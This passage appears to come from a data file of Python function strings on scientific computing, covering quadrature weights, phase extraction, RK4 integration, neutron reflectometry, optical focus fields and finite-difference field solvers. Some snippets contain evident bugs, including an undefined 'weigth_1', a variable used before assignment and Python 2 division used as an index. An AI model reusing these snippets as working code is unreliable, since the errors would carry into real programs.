direction_1\n self.omega[4,2] = direction_2\n\n self.omega[5,0] = direction_2\n self.omega[5,1] = direction_2\n self.omega[5,2] = direction_2\n\n self.omega[6,0] = direction_1\n self.omega[6,1] = direction_3\n self.omega[6,2] = direction_2\n\n self.omega[7,0] = direction_2\n self.omega[7,1] = direction_1\n self.omega[7,2] = direction_3\n\n self.omega[8,0] = direction_1\n self.omega[8,1] = direction_2\n self.omega[8,2] = direction_3\n\n self.omega[9,0] = direction_1\n self.omega[9,1] = direction_1\n self.omega[9,2] = direction_4\n\n self.weight[0] = weight_1\n self.weight[1] = weight_2\n self.weight[2] = weight_2\n self.weight[3] = weight_1\n self.weight[4] = weight_2\n self.weight[5] = weight_3\n self.weight[6] = weight_2\n self.weight[7] = weight_2\n self.weight[8] = weight_2\n self.weight[9] = weight_1\n\n elif self.sn==10 :\n direction_1 = 0.189321326478010476671494\n direction_2 = 0.508881755582618974382711\n direction_3 = 0.694318887594384317279217\n direction_4 = 0.839759962236684758403029\n direction_5 = 0.963490981110468484701598\n\n weight_1 = 0.0893031479843567214704325\n weight_2 = 0.0725291517123655242296233\n weight_3 = 0.0450437674364086390490892\n weight_4 = 0.0539281144878369243545650\n\n self.omega[0,0] = direction_5\n self.omega[0,1] = direction_1\n self.omega[0,2] = direction_1\n \n self.omega[1,0] = direction_4\n self.omega[1,1] = direction_2\n self.omega[1,2] = direction_1\n \n self.omega[2,0] = direction_3\n self.omega[2,1] = direction_3\n self.omega[2,2] = direction_1\n \n self.omega[3,0] = direction_2\n self.omega[3,1] = direction_4\n self.omega[3,2] = direction_1\n\n self.omega[4,0] = direction_1\n self.omega[4,1] = direction_5\n self.omega[4,2] = direction_1\n\n self.omega[5,0] = direction_4\n self.omega[5,1] = direction_1\n self.omega[5,2] = direction_2\n\n self.omega[6,0] = direction_3\n self.omega[6,1] = direction_2\n self.omega[6,2] = direction_2\n\n self.omega[7,0] = direction_2\n self.omega[7,1] = direction_3\n self.omega[7,2] = direction_2\n\n self.omega[8,0] = direction_1\n self.omega[8,1] = direction_4\n self.omega[8,2] = direction_2\n\n self.omega[9,0] = direction_3\n self.omega[9,1] = direction_1\n self.omega[9,2] = direction_3\n\n self.omega[10,0] = direction_2\n self.omega[10,1] = direction_2\n self.omega[10,2] = direction_3\n\n self.omega[11,0] = direction_1\n self.omega[11,1] = direction_3\n self.omega[11,2] = 
direction_3\n\n self.omega[12,0] = direction_2\n self.omega[12,1] = direction_1\n self.omega[12,2] = direction_4\n\n self.omega[13,0] = direction_1\n self.omega[13,1] = direction_2\n self.omega[13,2] = direction_4\n\n self.weight[0] = weight_1\n self.weight[1] = weight_2\n self.weight[2] = weight_3\n self.weight[3] = weight_2\n self.weight[4] = weight_1\n self.weight[5] = weight_2\n self.weight[6] = weight_4\n self.weight[7] = weight_4\n self.weight[8] = weight_2\n self.weight[9] = weight_3\n self.weight[10] = weight_4\n self.weight[11] = weight_3\n self.weight[12] = weight_2\n self.weight[13] = weight_2\n self.weight[14] = weight_1\n\n elif self.sn==12 :\n direction = np.zeros((6,1))\n\n direction[0] = 0.167212652822713264084504\n direction[1] = 0.459547634642594690016761\n direction[2] = 0.628019096642130901034766\n direction[3] = 0.760021014833664062877138\n direction[4] = 0.872270543025721502340662\n direction[5] = 0.971637719251358378302376\n\n weight_1 = 0.0707625899700910439766549\n weight_2 = 0.0558811015648888075828962\n weight_3 = 0.0373376737588285824652402\n weight_4 = 0.0502819010600571181385765\n weight_5 = 0.0258512916557503911218290\n\n for i in xrange(0,6) :\n self.omega[i,0] = direction[5-i]\n self.omega[i,1] = direction[i]\n self.omega[i,2] = direction[0]\n \n offset = 6\n for i in xrange(0,5) :\n self.omega[offset+i,0] = direction[4-i]\n self.omega[offset+i,1] = direction[i]\n self.omega[offset+i,2] = direction[1]\n\n offset += 5\n for i in xrange(0,4) :\n self.omega[offset+i,0] = direction[3-i]\n self.omega[offset+i,1] = direction[i]\n self.omega[offset+i,2] = direction[2]\n \n offset += 4\n for i in xrange(0,3) :\n self.omega[offset+i,0] = direction[2-i]\n self.omega[offset+i,1] = direction[i]\n self.omega[offset+i,2] = direction[3]\n\n offset += 3\n for i in xrange(0,2) :\n self.omega[offset+i,0] = direction[1-i]\n self.omega[offset+i,1] = direction[i]\n self.omega[offset+i,2] = direction[4]\n \n offset += 2\n self.omega[offset+i,0] = direction[0]\n self.omega[offset+i,1] = direction[1]\n self.omega[offset+i,2] = direction[5]\n\n self.weight[0] = weigth_1\n self.weight[1] = weight_2\n self.weight[2] = weight_3\n self.weight[3] = weight_3\n self.weight[4] = weight_2\n self.weight[5] = weight_1\n self.weight[6] = weight_2\n self.weight[7] = weight_4\n self.weight[8] = weight_5\n self.weight[9] = weight_4\n self.weight[10] = weight_2\n self.weight[11] = weight_3\n self.weight[12] = weight_5\n self.weight[13] = weight_5\n self.weight[14] = weight_3\n self.weight[15] = weight_3\n self.weight[16] = weight_4\n self.weight[17] = weight_3\n self.weight[18] = weight_2\n self.weight[19] = weight_2\n self.weight[20] = weight_1", "def extract_phase(eigvector, point_arr=[]):\n pa = point_arr\n if np.size(pa) == 0:\n pa = np.arange(len(evY))\n\n evX = eigvector[2 * pa]\n evY = eigvector[2 * pa + 1]\n phase = np.arctan2(evY.real, evX.real)\n # print 'evY[0] =', evY[0]\n # print 'evX[0] =', evX[0]\n # print 'phase[0] = ', phase[0]\n return phase", "def get_phase(self,):\n\n # for comparison\n initial_state = self._read('CPOW0')\n\n POW_step = 0.02197265\n POW = 0x00 | initial_state[0] << 8 | initial_state[1]\n phase = round(POW*POW_step, 2)\n\n print ('Latest phase set (i.e. 
currently in register):', phase)\n\n return self.phases", "def relative_phases(self):\r\n return np.angle(self.coherency)", "def relative_phases(self):\r\n return np.angle(self.coherency)", "def rk4_damp(xy, v, NL, KL, BM, Mm, beta, h):\n dx1 = h * v\n dv1 = h * fdspring(xy, v, NL, KL, BM, Mm, beta)\n dx2 = h * (v + dv1 / 2.)\n dv2 = h * fdspring(xy + dx1 / 2., v + dv1 / 2., NL, KL, BM, Mm, beta) # xy,NL,KL,BM, Mm, beta, NP,nn\n dx3 = h * (v + dv2 / 2.)\n dv3 = h * fdspring(xy + dx2 / 2., v + dv2 / 2., NL, KL, BM, Mm, beta)\n dx4 = h * (v + dv3)\n dv4 = h * fdspring(xy + dx3, v + dv3, NL, KL, BM, Mm, beta)\n xout = xy + (dx1 + 2. * dx2 + 2. * dx3 + dx4) / 6.\n vout = v + (dv1 + 2. * dv2 + 2. * dv3 + dv4) / 6.\n\n # print 'rk BM = ', BM\n return dx1, dv1, dx2, dv2, dx3, dv3, dx4, dv4, xout, vout", "def pnr(q, layers):\n xx = np.asfarray(q).astype(np.complex128).ravel()\n\n thetas = np.radians(layers[:, 4])\n thetas = np.diff(thetas)\n\n # nuclear SLD minus that of the superphase\n sld = layers[:, 1] + 1j * layers[:, 2] - layers[0, 1] - 1j * layers[0, 2]\n\n # nuclear and magnetic\n sldu = sld + layers[:, 3] - layers[0, 3]\n sldd = sld - layers[:, 3] + layers[0, 3]\n sldu *= 1e-6\n sldd *= 1e-6\n\n # wavevector in each layer\n kn_u = np.sqrt(0.25 * xx[:, np.newaxis] ** 2 - 4 * np.pi * sldu)\n kn_d = np.sqrt(0.25 * xx[:, np.newaxis] ** 2 - 4 * np.pi * sldd)\n\n mm = np.zeros((xx.size, 4, 4), np.complex128)\n mm[:] = np.identity(4, np.complex128)\n\n # iterate over layers\n for jj in range(len(layers) - 2):\n d, d_inv = _dmatrix(kn_u[:, jj + 1], kn_d[:, jj + 1])\n p = _pmatrix(kn_u[:, jj + 1], kn_d[:, jj + 1], layers[jj + 1, 0])\n r = _rmatrix(thetas[jj + 1])\n\n mm = mm @ d @ p @ d_inv @ r\n\n # d_inv for the first layer\n _, d_inv = _dmatrix(kn_u[:, 0], kn_d[:, 0])\n\n # d for the last layer\n d, _ = _dmatrix(kn_u[:, -1], kn_d[:, -1])\n r = _rmatrix(thetas[0])\n\n M = d_inv @ r @ mm @ d\n\n # equation 16 in Blundell and Bland\n den = M[:, 0, 0] * M[:, 2, 2] - M[:, 0, 2] * M[:, 2, 0]\n # uu\n pp = _magsqr((M[:, 1, 0] * M[:, 2, 2] - M[:, 1, 2] * M[:, 2, 0]) / den)\n\n # dd\n mm = _magsqr((M[:, 3, 2] * M[:, 0, 0] - M[:, 3, 0] * M[:, 0, 2]) / den)\n\n # ud\n pm = _magsqr((M[:, 3, 0] * M[:, 2, 2] - M[:, 3, 2] * M[:, 2, 0]) / den)\n\n # du\n mp = _magsqr((M[:, 1, 2] * M[:, 0, 0] - M[:, 1, 0] * M[:, 0, 2]) / den)\n\n return (pp, mm, pm, mp)", "def calc_phase(p, t):\n\n return (t % p)/p", "def focus_field_beam(shape = (128,128,128),\n units = (0.1,0.1,0.1),\n lam =.5, NA = .6, n0 = 1.,\n return_all_fields = False,\n n_integration_steps = 200):\n\n\n p = OCLProgram(absPath(\"kernels/psf_debye.cl\"),\n build_options = [\"-I\",absPath(\"kernels\"),\"-D\",\"INT_STEPS=%s\"%n_integration_steps])\n\n if np.isscalar(NA):\n NA = [0.,NA]\n \n Nx0, Ny0, Nz0 = shape\n dx, dy, dz = units\n\n #FIXME: the loop below does not yet work for odd inputs\n if not Nx0%2+Ny0%2+Nz0%2==0:\n raise NotImplementedError(\"odd shapes not supported yet\")\n\n\n alphas = np.arcsin(np.array(NA)/n0)\n assert len(alphas)%2 ==0\n\n # as we assume the psf to be symmetric, we just have to calculate each octant\n Nx = Nx0//2+1\n Ny = Ny0//2+1\n Nz = Nz0//2+1\n\n u_g = OCLArray.empty((Nz,Ny,Nx),np.float32)\n ex_g = OCLArray.empty(u_g.shape,np.complex64)\n ey_g = OCLArray.empty(u_g.shape,np.complex64)\n ez_g = OCLArray.empty(u_g.shape,np.complex64)\n\n alpha_g = OCLArray.from_array(alphas.astype(np.float32))\n\n \n p.run_kernel(\"debye_wolf\",u_g.shape[::-1],None,\n ex_g.data,ey_g.data,ez_g.data, u_g.data,\n 
np.float32(1.),np.float32(0.),\n np.float32(0.),np.float32(dx*(Nx-1.)),\n np.float32(0.),np.float32(dy*(Ny-1.)),\n np.float32(0.),np.float32(dz*(Nz-1.)),\n np.float32(lam), np.float32(n0),\n alpha_g.data, np.int32(len(alphas)))\n\n u = u_g.get()\n ex = ex_g.get()\n ey = ey_g.get()\n ez = ez_g.get()\n\n u_all = np.empty((Nz0,Ny0,Nx0),np.float32)\n ex_all = np.empty((Nz0,Ny0,Nx0),np.complex64)\n ey_all = np.empty((Nz0,Ny0,Nx0),np.complex64)\n ez_all = np.empty((Nz0,Ny0,Nx0),np.complex64)\n\n sx = [slice(0,Nx),slice(Nx,Nx0)]\n sy = [slice(0,Ny),slice(Ny,Ny0)]\n sz = [slice(0,Nz),slice(Nz,Nz0)]\n\n\n\n # spreading the calculated octant to the full volume\n for i,j,k in itertools.product([0,1],[0,1],[0,1]):\n\n # i, j, k = 0 indicates the + octant\n\n u_all[sz[1-i],sy[1-j],sx[1-k]] = u[1-i:Nz-1+i,1-j :Ny-1+j,1-k :Nx-1+k][::(-1)**i,::(-1)**j,::(-1)**k]\n if i ==0:\n ex_all[sz[1-i],sy[1-j],sx[1-k]] = ex[1-i:Nz-1+i,1-j :Ny-1+j,1-k :Nx-1+k][::(-1)**i,::(-1)**j,::(-1)**k]\n ey_all[sz[1-i],sy[1-j],sx[1-k]] = ey[1-i:Nz-1+i,1-j :Ny-1+j,1-k :Nx-1+k][::(-1)**i,::(-1)**j,::(-1)**k]\n ez_all[sz[1-i],sy[1-j],sx[1-k]] = ez[1-i:Nz-1+i,1-j :Ny-1+j,1-k :Nx-1+k][::(-1)**i,::(-1)**j,::(-1)**k]\n\n else:\n ex_all[sz[1-i],sy[1-j],sx[1-k]] = np.conjugate(ex[1-i:Nz-1+i,1-j :Ny-1+j,1-k :Nx-1+k][::(-1)**i,::(-1)**j,::(-1)**k])\n ey_all[sz[1-i],sy[1-j],sx[1-k]] = np.conjugate(ey[1-i:Nz-1+i,1-j :Ny-1+j,1-k :Nx-1+k][::(-1)**i,::(-1)**j,::(-1)**k])\n ez_all[sz[1-i],sy[1-j],sx[1-k]] = np.conjugate(ez[1-i:Nz-1+i,1-j :Ny-1+j,1-k :Nx-1+k][::(-1)**i,::(-1)**j,::(-1)**k])\n\n if return_all_fields:\n return u_all, ex_all, ey_all, ez_all\n else:\n return u_all", "def efSolver2(self):\n dx = self.dh[0] # dx\n dy = self.dh[1] # dy\n dz = self.dh[2] # dz\n \n \"\"\"\n for i in np.arange(0, self.ni):\n for j in np.arange(0, self.nj):\n for k in np.arange(0, self.nk):\n \"\"\"\n\n ##x-component#\n #if i==0: \n #x-component#\n \"\"\"\n if i==0: \n # forward\n self.ef[i][j][k][0] = -(-3*self.phi[i][j][k]+\\\n 4*self.phi[i+1][j][k]-\\\n self.phi[i+2][j][k])/(2*dx)\n \"\"\"\n \n # forward\n self.ef[0,0:self.nj,0:self.nk,0] = -(-3*self.phi[0,0:self.nj,0:self.nk]+\\\n 4*self.phi[1,0:self.nj,0:self.nk]-\\\n self.phi[2,0:self.nj,0:self.nk])/(2*dx)\n \n #elif i==self.ni-1: \n \"\"\"\n elif i==self.ni-1: \n # backward\n self.ef[i][j][k][0] = -(self.phi[i-2][j][k]-\\\n 4*self.phi[i-1][j][k]+\\\n 3*self.phi[i][j][k])/(2*dx)\n \"\"\" \n # backward\n self.ef[self.ni-1,0:self.nj,0:self.nk,0] = -(self.phi[self.ni-3,0:self.nj,0:self.nk]-\\\n 4*self.phi[self.ni-2,0:self.nj,0:self.nk]+\\\n 3*self.phi[self.ni-1,0:self.nj,0:self.nk])/(2*dx)\n \"\"\"\n else: \n #central\n self.ef[i][j][k][0] = -(self.phi[i+1][j][k] - \\\n self.phi[i-1][j][k])/(2*dx)\n \"\"\" \n #central\n self.ef[1:self.ni-1,0:self.nj,0:self.nk,0] = -(self.phi[2:self.ni,0:self.nj,0:self.nk] - \\\n self.phi[0:self.ni-2,0:self.nj,0:self.nk])/(2*dx)\n\n\n #y-component\n #if j==0:\n \"\"\"\n if j==0:\n self.ef[i][j][k][1] = -(-3*self.phi[i][j][k] + \\\n 4*self.phi[i][j+1][k]-\\\n self.phi[i][j+2][k])/(2*dy)\n \n \"\"\"\n self.ef[0:self.ni,0,0:self.nk,1] = -(-3*self.phi[0:self.ni,0,0:self.nk] + \\\n 4*self.phi[0:self.ni,1,0:self.nk]-\\\n self.phi[0:self.ni,2,0:self.nk])/(2*dy)\n #elif j==self.nj-1:\n \"\"\"\n elif j==self.nj-1:\n self.ef[i][j][k][1] = -(self.phi[i][j-2][k] - \\\n 4*self.phi[i][j-1][k] +\\\n 3*self.phi[i][j][k])/(2*dy)\n \n \"\"\"\n self.ef[0:self.ni,self.nj-1,0:self.nk,1] = -(self.phi[0:self.ni,self.nj-3,0:self.nk] - \\\n 4*self.phi[0:self.ni,self.nj-2,0:self.nk] +\\\n 
3*self.phi[0:self.ni,self.nj-1,0:self.nk])/(2*dy)\n #else:\n \"\"\"\n else:\n self.ef[i][j][k][1] = -(self.phi[i][j+1][k] - \\\n self.phi[i][j-1][k])/(2*dy)\n\n \"\"\"\n self.ef[0:self.ni,1:self.nj-1,0:self.nk,1] = -(self.phi[0:self.ni,2:self.nj,0:self.nk] - \\\n self.phi[0:self.ni,0:self.nj-2,0:self.nk])/(2*dy)\n\n #z-component\n '''\n if k==0:\n self.ef[i][j][k][2] = -(-3*self.phi[i][j][k] + \\\n 4*self.phi[i][j][k+1]-\n self.phi[i][j][k+2])/(2*dz)\n \n '''\n #z-component\n #if k==0:\n self.ef[0:self.ni,0:self.nj,0,2] = -(-3*self.phi[0:self.ni,0:self.nj,0] + \\\n 4*self.phi[0:self.ni,0:self.nj,1]-\n self.phi[0:self.ni,0:self.nj,2])/(2*dz)\n\n \"\"\"\n elif k==self.nk-1:\n self.ef[i][j][k][2] = -(self.phi[i][j][k-2] - \\\n 4*self.phi[i][j][k-1] + \\\n 3*self.phi[i][j][k])/(2*dz)\n \"\"\"\n \n #elif k==self.nk-1:\n self.ef[0:self.ni,0:self.nj,self.nk-1,2] = -(self.phi[0:self.ni,0:self.nj,self.nk-3] - \\\n 4*self.phi[0:self.ni,0:self.nj,self.nk-2] + \\\n 3*self.phi[0:self.ni,0:self.nj,self.nk-1])/(2*dz) \n \"\"\"\n else:\n self.ef[i][j][k][2] = -(self.phi[i][j][k+1] - \\\n self.phi[i][j][k-1])/(2*dz)\n \"\"\"\n #else:\n self.ef[0:self.ni,0:self.nj,1:self.nk-1,2] = -(self.phi[0:self.ni,0:self.nj,2:self.nk] - \\\n self.phi[0:self.ni,0:self.nj,0:self.nk-2])/(2*dz)", "def get_phase_and_composition(self):\n data = self.data\n total = data.sum()\n if total <= 0.: raise RuntimeError(f\"'{phase_names[self.phase]}' phase does not exist\")\n return self.phase, data / total", "def phase(self):\n return self.data", "def ex_4pdeer(param): \r\n param = _parsargs(param,npar=1) \r\n \r\n # Dipolar pathways\r\n lam = param[0]\r\n pathways = [\r\n [1-lam],\r\n [lam, 0]\r\n ]\r\n return pathways", "def m_phase(self):\n return self._m_phase", "def phase_derivative_var_map(image, k):\n dx_phase = delta_x(image)\n dy_phase = delta_y(image)\n\n ny, nx = dx_phase.shape\n assert(ny == nx) ## assert a square image for simplicity\n if (k%2 == 0):\n print(\"k has to be an uneven integer!\")\n return\n N = nx\n i, j = np.arange(N), np.arange(N)\n ii, jj = np.meshgrid(i, j)\n zmn = np.zeros((N,N))\n \n \n\n inside = (jj[k/2:N-(k/2), k/2:N-(k/2)].flatten(), ii[k/2:N-(k/2), k/2:N-(k/2)].flatten())\n krange = np.linspace(-1 * (k/2), (k/2), k, dtype = 'int64') ## amount of added spaces, if k = 5, it ranges from -2 to 2\n krange_tile = np.tile(krange * N, (k, 1)).T ## tile them to make a (k/2)**2 matrix, containing for instance -2N, -N, 0, N, 2N for k=5\n k_tile = np.tile(krange, (k, 1)) ## tile to add to krange_tile\n coords_add = (krange_tile + k_tile).flatten() ## all coordinates, in a (k/2)**2 matrix, from -2N - 2: -2N + 2, -N-2 : -N+2 , -2 : 2, N -2 : N +2, 2N -2 : 2N +2\n inside = np.ravel_multi_index(inside, (N, N))\n coords_add = np.tile(coords_add, (len(inside), 1)) ## stack all differences to add to inside\n inside_tile = np.tile(inside, (coords_add.shape[1],1)).T ## stack all inside to add to differences\n all_coords = inside_tile + coords_add### a matrix of len(inside) x (k/2)**2 with all coordinates in a k x k square around a certain coordinate\n unrav_coords = np.unravel_index(all_coords, (N, N)) ## unraveled coordinates of all coordinates\n \n avg_x, avg_y = np.sum(dx_phase[unrav_coords], axis = 1)/k**2, np.sum(dy_phase[unrav_coords], axis = 1)/k**2\n avg_x_tile, avg_y_tile = np.tile(avg_x, (all_coords.shape[1], 1)).T, np.tile(avg_y, (all_coords.shape[1], 1)).T\n sum_x, sum_y = np.sum(np.square(dx_phase[unrav_coords] - avg_x_tile), axis = 1), np.sum(np.square(dy_phase[unrav_coords] - avg_y_tile), axis = 1)\n 
zmn[np.unravel_index(inside, (N, N))] = (np.sqrt(sum_x) + np.sqrt(sum_y)) / (k**2)\n\n\n\n #### top layers\n for i in range(k/2):\n ## for indices directly above the \"inside square\"\n top = (jj[i, k/2:N-(k/2)].flatten(), ii[i, k/2: N - (k/2)].flatten())\n coords_add = (krange_tile + k_tile)[(k/2)-i:, :].flatten()\n top = np.ravel_multi_index(top, (N, N))\n coords_add = np.tile(coords_add, (len(top), 1))\n top_tile = np.tile(top, (coords_add.shape[1],1)).T\n top_coords = top_tile + coords_add\n unrav_coords = np.unravel_index(top_coords, (N, N))\n avg_x, avg_y = np.sum(dx_phase[unrav_coords], axis = 1)/k**2, np.sum(dy_phase[unrav_coords], axis = 1)/k**2\n avg_x_tile, avg_y_tile = np.tile(avg_x, (top_coords.shape[1], 1)).T, np.tile(avg_y, (top_coords.shape[1], 1)).T\n sum_x, sum_y = np.sum(np.square(dx_phase[unrav_coords] - avg_x_tile), axis = 1), np.sum(np.square(dy_phase[unrav_coords] - avg_y_tile), axis = 1)\n zmn[np.unravel_index(top, (N, N))] = (np.sqrt(sum_x) + np.sqrt(sum_y)) / (k**2)\n## sum_sin_top = np.sum(np.sin(image[unrav_coords]), axis = 1)\n## sum_cos_top = np.sum(np.cos(image[unrav_coords]), axis = 1)\n## psi_top = np.arctan2(sum_sin_top, sum_cos_top)\n## filt_psi[np.unravel_index(top, (N, N))] = psi_top\n\n ## indices directly below the \"inside square\"\n bot = (jj[N- 1 - i, k/2:N-(k/2)].flatten(), ii[N-1-i, k/2: N - (k/2)].flatten()) ## starting at the bottom working inwards\n coords_add = (krange_tile + k_tile)[:(k/2) + 1 + i, :].flatten()\n bot = np.ravel_multi_index(bot, (N, N))\n coords_add = np.tile(coords_add, (len(top), 1))\n bot_tile = np.tile(bot, (coords_add.shape[1],1)).T\n bot_coords = bot_tile + coords_add\n unrav_coords = np.unravel_index(bot_coords, (N, N))\n avg_x, avg_y = np.sum(dx_phase[unrav_coords], axis = 1)/k**2, np.sum(dy_phase[unrav_coords], axis = 1)/k**2\n avg_x_tile, avg_y_tile = np.tile(avg_x, (bot_coords.shape[1], 1)).T, np.tile(avg_y, (bot_coords.shape[1], 1)).T\n sum_x, sum_y = np.sum(np.square(dx_phase[unrav_coords] - avg_x_tile), axis = 1), np.sum(np.square(dy_phase[unrav_coords] - avg_y_tile), axis = 1)\n zmn[np.unravel_index(bot, (N, N))] = (np.sqrt(sum_x) + np.sqrt(sum_y)) / (k**2)\n\n ## indices directly left of the \"inside square\"\n left = (jj[k/2:N-(k/2), i].flatten(), ii[k/2:N-(k/2), i].flatten()) ## starting at the bottom working inwards\n coords_add = (krange_tile + k_tile)[:, (k/2)-i:].flatten()\n left = np.ravel_multi_index(left, (N, N))\n coords_add = np.tile(coords_add, (len(left), 1))\n left_tile = np.tile(left, (coords_add.shape[1],1)).T\n left_coords = left_tile + coords_add\n unrav_coords = np.unravel_index(left_coords, (N, N))\n avg_x, avg_y = np.sum(dx_phase[unrav_coords], axis = 1)/k**2, np.sum(dy_phase[unrav_coords], axis = 1)/k**2\n avg_x_tile, avg_y_tile = np.tile(avg_x, (left_coords.shape[1], 1)).T, np.tile(avg_y, (left_coords.shape[1], 1)).T\n sum_x, sum_y = np.sum(np.square(dx_phase[unrav_coords] - avg_x_tile), axis = 1), np.sum(np.square(dy_phase[unrav_coords] - avg_y_tile), axis = 1)\n zmn[np.unravel_index(left, (N, N))] = (np.sqrt(sum_x) + np.sqrt(sum_y)) / (k**2)\n\n ## indices directly left of the \"inside square\"\n right = (jj[k/2:N-(k/2), N - 1 - i].flatten(), ii[k/2:N-(k/2), N - 1 - i].flatten()) ## starting at the bottom working inwards\n coords_add = (krange_tile + k_tile)[:, :(k/2)+1+i].flatten()\n right = np.ravel_multi_index(right, (N, N))\n coords_add = np.tile(coords_add, (len(right), 1))\n right_tile = np.tile(right, (coords_add.shape[1],1)).T\n right_coords = right_tile + coords_add\n 
unrav_coords = np.unravel_index(right_coords, (N, N))\n avg_x, avg_y = np.sum(dx_phase[unrav_coords], axis = 1)/k**2, np.sum(dy_phase[unrav_coords], axis = 1)/k**2\n avg_x_tile, avg_y_tile = np.tile(avg_x, (right_coords.shape[1], 1)).T, np.tile(avg_y, (right_coords.shape[1], 1)).T\n sum_x, sum_y = np.sum(np.square(dx_phase[unrav_coords] - avg_x_tile), axis = 1), np.sum(np.square(dy_phase[unrav_coords] - avg_y_tile), axis = 1)\n zmn[np.unravel_index(right, (N, N))] = (np.sqrt(sum_x) + np.sqrt(sum_y)) / (k**2)\n\n return zmn", "def get_trace_spectral_phase(self, linear_comp=True):\n eps = self.phase_thr # Threshold for intensity where we have signal\n\n # Check if there is a reconstructed field:\n if self.Et is not None:\n N = self.Et.shape[0]\n w_ind = np.argsort(np.fft.fftfreq(N)) # Sorted index vector to unravel the fft:d E-field vector\n\n # Center peak in time\n ind = np.argmax(abs(self.Et))\n shift = (self.Et.shape[0] / 2 - ind).astype(np.int)\n Et = np.roll(self.Et, shift)\n\n Ew = np.fft.fft(np.fft.fftshift(Et))[w_ind]\n # Normalize\n Ew /= abs(Ew).max()\n\n # Unravelling 2*pi phase jumps\n ph0_ind = np.argmax(abs(Ew))\n ph = np.angle(Ew)\n ph_diff = np.diff(ph)\n # We need to sample often enough that the difference in phase is less than 5 rad\n # A larger jump is taken as a 2*pi phase jump\n ph_ind = np.where(np.abs(ph_diff) > 5.0)\n # Loop through the 2*pi phase jumps\n for ind in ph_ind[0]:\n if ph_diff[ind] < 0:\n ph[ind + 1:] += 2 * np.pi\n else:\n ph[ind + 1:] -= 2 * np.pi\n\n # Find relevant portion of the pulse (intensity above a threshold value)\n Ew_mag = np.abs(Ew)\n low_ind = np.where(Ew_mag < eps)\n ph[low_ind] = np.nan\n\n # Here we could go through contiguous regions and make the phase connect at the edges...\n\n # Linear compensation is we have a frequency shift (remove 1st order phase)\n if linear_comp is True:\n idx = np.isfinite(ph)\n x = np.arange(N)\n ph_poly = np.polyfit(x[idx], ph[idx], 1)\n ph_out = ph - np.polyval(ph_poly, x)\n else:\n ph_out = ph\n ph_out -= ph_out[ph0_ind]\n else:\n ph_out = None\n return ph_out", "def far_fields(horn_width, horn_height, eplane_effective_length, hplane_effective_length, frequency, r, theta, phi):\n # Calculate the wavenumber\n k = 2.0 * pi * frequency / c\n\n # Calculate the wave impedance\n eta = sqrt(mu_0 / epsilon_0)\n\n # Define the radial-component of the electric field\n e_r = 0.0\n\n # Define the theta-component of the electric field\n e_theta = 1j * k / (4.0 * pi * r) * exp(-1j * k * r) * sin(phi) * (1.0 + cos(theta)) * \\\n I1(k, horn_width, hplane_effective_length, theta, phi) * \\\n I2(k, horn_height, eplane_effective_length, theta, phi)\n\n # Define the phi-component of the electric field\n e_phi = 1j * k / (4.0 * pi * r) * exp(-1j * k * r) * cos(phi) * (1.0 + cos(theta)) * \\\n I1(k, horn_width, hplane_effective_length, theta, phi) * \\\n I2(k, horn_height, eplane_effective_length, theta, phi)\n\n # Define the radial-component of the magnetic field\n h_r = 0.0\n\n # Define the theta-component of the magnetic field\n h_theta = 1j * k / (4.0 * pi * r) * exp(-1j * k * r) * -cos(phi) * (1.0 + cos(theta)) / eta * \\\n I1(k, horn_width, hplane_effective_length, theta, phi) * \\\n I2(k, horn_height, eplane_effective_length, theta, phi)\n\n # Define the phi-component of the magnetic field\n h_phi = 1j * k / (4.0 * pi * r) * exp(-1j * k * r) * sin(phi) * (1.0 + cos(theta)) / eta * \\\n I1(k, horn_width, hplane_effective_length, theta, phi) * \\\n I2(k, horn_height, eplane_effective_length, theta, phi)\n\n # Return all 
six components of the far field\n return e_r, e_theta, e_phi, h_r, h_theta, h_phi", "def phaseEstimator(phases,omegas,T_s,k):\n length = phases.shape[0]\n pis = np.tile(2*np.pi,length)\n a = phases - T_s*k*omegas\n phaseShifts = np.mod(a,pis)\n b = phases-phaseShifts\n omega_hat = np.mod(b,pis)\n n = omega_hat/omegas\n estimatedTime = np.sum(n)/length\n \n estimatedPhase = phaseShifts + estimatedTime*omegas\n \n return estimatedPhase", "def COM_a4(fname, Ekev, debug=0, plot=1):\n b = a4b.Bfield_ascot(fname)\n E=Ekev*1000*1.602e-19\n \n # Getting psi_2d (Normalized to edge and axis value) and interpolate it\n psiw = b.psiedge[0]; psia=b.psiaxis[0];\n # TEMPORARY FIX\n psia=-psia;\n #\n zaxis=b.vardict['zaxis']\n _R = b.R\n _z = b.z\n psi2d_param = interp.interp2d(_R, _z, (b.psi-psia)/(psiw-psia))\n #psi2d_param_notnorm = interp.interp2d(_R, _z, eq.psi)\n # Finding the axis R0 of the device, which is the one to use to normalize\n R0 = _R[np.argmin(psi2d_param(_R,zaxis))]\n psi_on_midplane = psi2d_param(_R,zaxis)\n R = _R[psi_on_midplane<1.] #R on midplane inside lcfs\n #T is as function of psi (equidistant)\n B = b.Bphi\n #Forcing B to be positive and decreasing in R\n B = np.abs(B)\n B_param = interp.interp2d(_R, _z, B)\n Bmin = np.min(B_param(R,zaxis)); Bmax=np.max(B_param(R,zaxis))\n\n T_on_midplane = B_param(R,zaxis)*R\n T_param = interp.interp1d(R, T_on_midplane)\n\n Rmin = min(R); Rmax=max(R)\n B0 = B_param(R0, zaxis)[0]\n #finding also extrema of g\n g_param=T_param\n gedge = np.abs(g_param(Rmax))\n g0 = np.abs(g_param(R0))\n # We want psi increasing from 0 to psi_wall\n psi=np.linspace(0,1, np.size(_R))\n print(psia, psiw)\n if psiw<psia or psiw<=0 or psia<0:\n psiw-=psia; psi-=psia; psia-=psia; # now stuff set from 0 to something.\n if psiw<0: \n psiw=psiw*-1.; psi*=-1;\n ####################################################################\n #print values for debugging\n if debug:\n print('Rmin={:.2f}; Rmax={:.2f}; R={:.2f}'.format(Rmin, Rmax, R0))\n print('Bmin={:.2f}; Bmax={:.2f}; B={:.2f}'.format(Bmin, Bmax, B0))\n print('gax={:.2f}; gedge={:.2f}; B0R0={:.2f}'.format(g0, gedge, R0*B0))\n print('psiw={:.2f}; psiax={:.2f}'.format(psiw, psia))\n \n # get normalized units\n mp=1.67e-27; q=1.602e-19;\n A=2; Z=1;\n R_notnorm=np.copy(R); \n B/=B0; Bmin/=B0; Bmax/=B0; #normalizing B\n R/=R0; Rmin/=R0; Rmax/=R0; #Normalizing R\n gedge = gedge/(R0*B0)\n g0 = g0/(R0*B0)\n psiw = psiw/(R0*R0*B0)\n psia = psia/(R0*R0*B0)\n psi = psi/(R0*R0*B0)\n E = E*mp*A/(Z*Z*q*q*R0**2*B0**2)\n\n #print values for debugging\n if debug:\n print('After normalization')\n print('Bmin={:.2f}; 